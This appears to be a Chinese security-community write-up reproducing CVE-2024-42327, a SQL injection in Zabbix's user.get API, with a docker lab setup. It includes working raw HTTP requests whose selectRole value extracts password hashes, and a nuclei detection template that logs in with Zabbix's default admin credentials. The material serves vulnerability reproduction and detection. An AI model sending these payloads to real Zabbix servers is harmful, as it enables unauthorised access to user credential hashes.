wahaha 2025-03-07 文章来源:SecHub网络安全社区
漏洞存在于 user.get API 端点,拥有 API 访问权限的非管理员用户(包括默认的“用户”角色)都可能利用该漏洞。
6.0.0 <= Zabbix <= 6.0.31
6.4.0 <= Zabbix <= 6.4.16
Zabbix 7.0.0
docker 搭建环境
# Create the working directory and every host path that docker-compose.yml
# bind-mounts; each step only runs if the previous one succeeded.
mkdir -p /zabbix-server \
  && cd /zabbix-server \
  && mkdir -p ./mysql/data ./mysql/conf ./mysql/logs \
              ./font ./snmptraps ./mibs ./alertscripts ./externalscripts

# Pre-pull the pinned images: MySQL 8.0 plus all Zabbix components at the
# same 6.0.0 tag (inside the affected range listed above).
docker pull mysql:8.0 \
  && docker pull zabbix/zabbix-java-gateway:6.0.0-ubuntu \
  && docker pull zabbix/zabbix-snmptraps:6.0.0-ubuntu \
  && docker pull zabbix/zabbix-server-mysql:6.0.0-ubuntu \
  && docker pull zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu

# The compose file mounts ./font/simfang.ttf over the web UI's font file.
# Only the removal of any old copy is shown here; a font file with that name
# has to be placed in this directory before the stack is started, otherwise
# Docker creates an empty directory at the bind-mount source instead.
cd /zabbix-server/font/
rm -rf simfang.ttf
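# docker-compose.yml — lab stack for reproducing CVE-2024-42327.
# Every Zabbix component is pinned to 6.0.0, which lies inside the affected
# range listed above (6.0.0 <= Zabbix <= 6.0.31); MySQL 8.0 is the backend.
#
# Changes versus the original listing:
#   * indentation restored (the page had every line at column 0, which does
#     not parse as a compose file);
#   * `privileged: true` dropped from all five services — none of these images
#     needs host-device access, and a privileged container turns any foothold
#     on this deliberately vulnerable stack into full control of the host (on
#     SELinux hosts use the `:z` bind-mount option rather than privileged mode);
#   * legacy `links:` replaced by `depends_on:`, which keeps the same start
#     ordering; name resolution already works over the shared `zabbix-net`;
#   * host files the containers only read are mounted read-only.
# The credentials below are throwaway lab values shared across services.
version: '3'

services:
  mysql:
    image: mysql:8.0
    container_name: mysql
    volumes:
      - ./mysql/data:/var/lib/mysql
      - ./mysql/conf:/etc/mysql/conf.d
      - ./mysql/logs:/var/log/mysql
      - /etc/localtime:/etc/localtime:ro
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=myrootpass
      - MYSQL_DATABASE=zabbix
      - MYSQL_USER=zabbix
      - MYSQL_PASSWORD=mypass
      - TZ=Asia/Shanghai
      - LANG=en_US.UTF-8
    # Reachable only from the compose network; no host port is published.
    expose:
      - "3306"
    networks:
      zabbix-net:
    command: --character-set-server=utf8 --collation-server=utf8_bin

  zabbix-gateway:
    image: zabbix/zabbix-java-gateway:6.0.0-ubuntu
    container_name: zabbix-gateway
    volumes:
      - /etc/localtime:/etc/localtime:ro
    restart: always
    ports:
      - "10052:10052"
    networks:
      zabbix-net:

  zabbix-snmptraps:
    image: zabbix/zabbix-snmptraps:6.0.0-ubuntu
    container_name: zabbix-snmptraps
    volumes:
      - /etc/localtime:/etc/localtime:ro
      - ./snmptraps:/var/lib/zabbix/snmptraps
      - ./mibs:/var/lib/zabbix/mibs
    restart: always
    ports:
      - "1162:1162/udp"
    networks:
      zabbix-net:

  zabbix-server:
    image: zabbix/zabbix-server-mysql:6.0.0-ubuntu
    container_name: zabbix-server
    volumes:
      - /etc/localtime:/etc/localtime:ro
      - ./snmptraps:/var/lib/zabbix/snmptraps
      - ./mibs:/var/lib/zabbix/mibs
      - ./alertscripts:/usr/lib/zabbix/alertscripts
      - ./externalscripts:/usr/lib/zabbix/externalscripts
    restart: always
    environment:
      - ZBX_LISTENPORT=10051
      - DB_SERVER_HOST=mysql
      - DB_SERVER_PORT=3306
      - MYSQL_DATABASE=zabbix
      - MYSQL_USER=zabbix
      - MYSQL_PASSWORD=mypass
      - MYSQL_ROOT_PASSWORD=myrootpass
      # Cache sizes are generous for a lab; lower them on a small host.
      - ZBX_CACHESIZE=1G
      - ZBX_HISTORYCACHESIZE=512M
      - ZBX_HISTORYINDEXCACHESIZE=16M
      - ZBX_TRENDCACHESIZE=256M
      - ZBX_VALUECACHESIZE=256M
      - ZBX_STARTPINGERS=64
      - ZBX_IPMIPOLLERS=1
      - ZBX_ENABLE_SNMP_TRAPS=true
      - ZBX_STARTTRAPPERS=1
      - ZBX_JAVAGATEWAY_ENABLE=true
      - ZBX_JAVAGATEWAY=zabbix-gateway
      - ZBX_STARTJAVAPOLLERS=1
    ports:
      - "10051:10051"
    networks:
      zabbix-net:
    depends_on:
      - mysql
      - zabbix-gateway

  zabbix-web:
    image: zabbix/zabbix-web-nginx-mysql:6.0.0-ubuntu
    container_name: zabbix-web
    volumes:
      # Bind-mounts a host font file over the UI's default font. The host file
      # must exist before `docker-compose up`: if ./font/simfang.ttf is missing,
      # Docker creates an empty directory at that path and the UI font is
      # shadowed by a directory.
      - ./font/simfang.ttf:/usr/share/zabbix/assets/fonts/DejaVuSans.ttf:ro
      - /etc/localtime:/etc/localtime:ro
    restart: always
    environment:
      - ZBX_SERVER_NAME=Zabbix 6.0.0
      - ZBX_SERVER_HOST=zabbix-server
      - ZBX_SERVER_PORT=10051
      - DB_SERVER_HOST=mysql
      - DB_SERVER_PORT=3306
      - MYSQL_DATABASE=zabbix
      - MYSQL_USER=zabbix
      - MYSQL_PASSWORD=mypass
      - MYSQL_ROOT_PASSWORD=myrootpass
      - PHP_TZ=Asia/Shanghai
    # The vulnerable API (/api_jsonrpc.php) is served on host port 80; keep
    # this stack on an isolated lab network.
    ports:
      - "80:8080"
    networks:
      zabbix-net:
    depends_on:
      - mysql
      - zabbix-server

networks:
  zabbix-net:
    driver: bridge
    ipam:
      config:
        - subnet: 10.10.10.0/24
          gateway: 10.10.10.1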
# Start the whole stack in the background (long form of `-d`).
docker-compose up --detach
访问默认端口即可
需要先登录,获取 auth_token
POST /api_jsonrpc.php HTTP/1.1
Host: ***.***.***.***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: keep-alive
Content-Length: 106
Content-Type: application/json-rpc
Accept-Encoding: gzip, deflate, br
{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "aaaa", "password": "123456"}, "id": 1}
用上一步获取的 token 发送以下请求
POST /api_jsonrpc.php HTTP/1.1
Host: ***.***.***.***
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Connection: keep-alive
Content-Length: 167
Content-Type: application/json-rpc
Accept-Encoding: gzip, deflate, br
{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "2bbce9ff7cv2hid40092b297441fa3r4", "id": 1}

nuclei 检测:
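# Nuclei template for CVE-2024-42327 (Zabbix user.get SQL injection).
# Indentation restored from the flattened listing. The extraction also appears
# to have dropped the blank line that separates headers from body in each raw
# request; nuclei needs it to send the JSON-RPC body, so it is restored here.
id: CVE-2024-42327-zabbix-sqli

info:
  name: zabbix-api_jsonrpc-sqli
  author: Ly4j
  # NOTE(review): the vendor rates this issue as critical — confirm against
  # the CVE record and raise the severity if so.
  severity: high
  reference:
    - https://github.com/aramosf/cve-2024-42327?tab=readme-ov-file
  tags: zabbix,sqli

requests:
  - raw:
      # Step 1: log in with Zabbix's out-of-the-box Admin account. Where the
      # default password was changed this login fails, the `auth` extractor
      # finds no `.result`, and the template reports nothing — so a negative
      # result does not establish that the target is patched.
      - |
        POST /api_jsonrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json-rpc

        {"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1}
      # Step 2: user.get with the `selectRole` value from the write-up above;
      # the match only checks that a `passwd` key comes back in the response.
      - |
        POST /api_jsonrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json-rpc

        {"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "{{auth}}", "id": 1}
    matchers:
      - type: dsl
        dsl:
          # NOTE(review): with two requests, `status_code_2` is the explicit
          # form if the status check is meant for the second response.
          - status_code==200 && contains_all(body_1,"jsonrpc") && contains_all(body_2,"passwd")
    extractors:
      # Carries the session token from response 1 into request 2 only;
      # `internal: true` keeps it out of the reported output.
      - type: json
        internal: true
        name: auth
        json:
          - '.result'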
python 利用脚本:
https://github.com/aramosf/cve-2024-42327?tab=readme-ov-file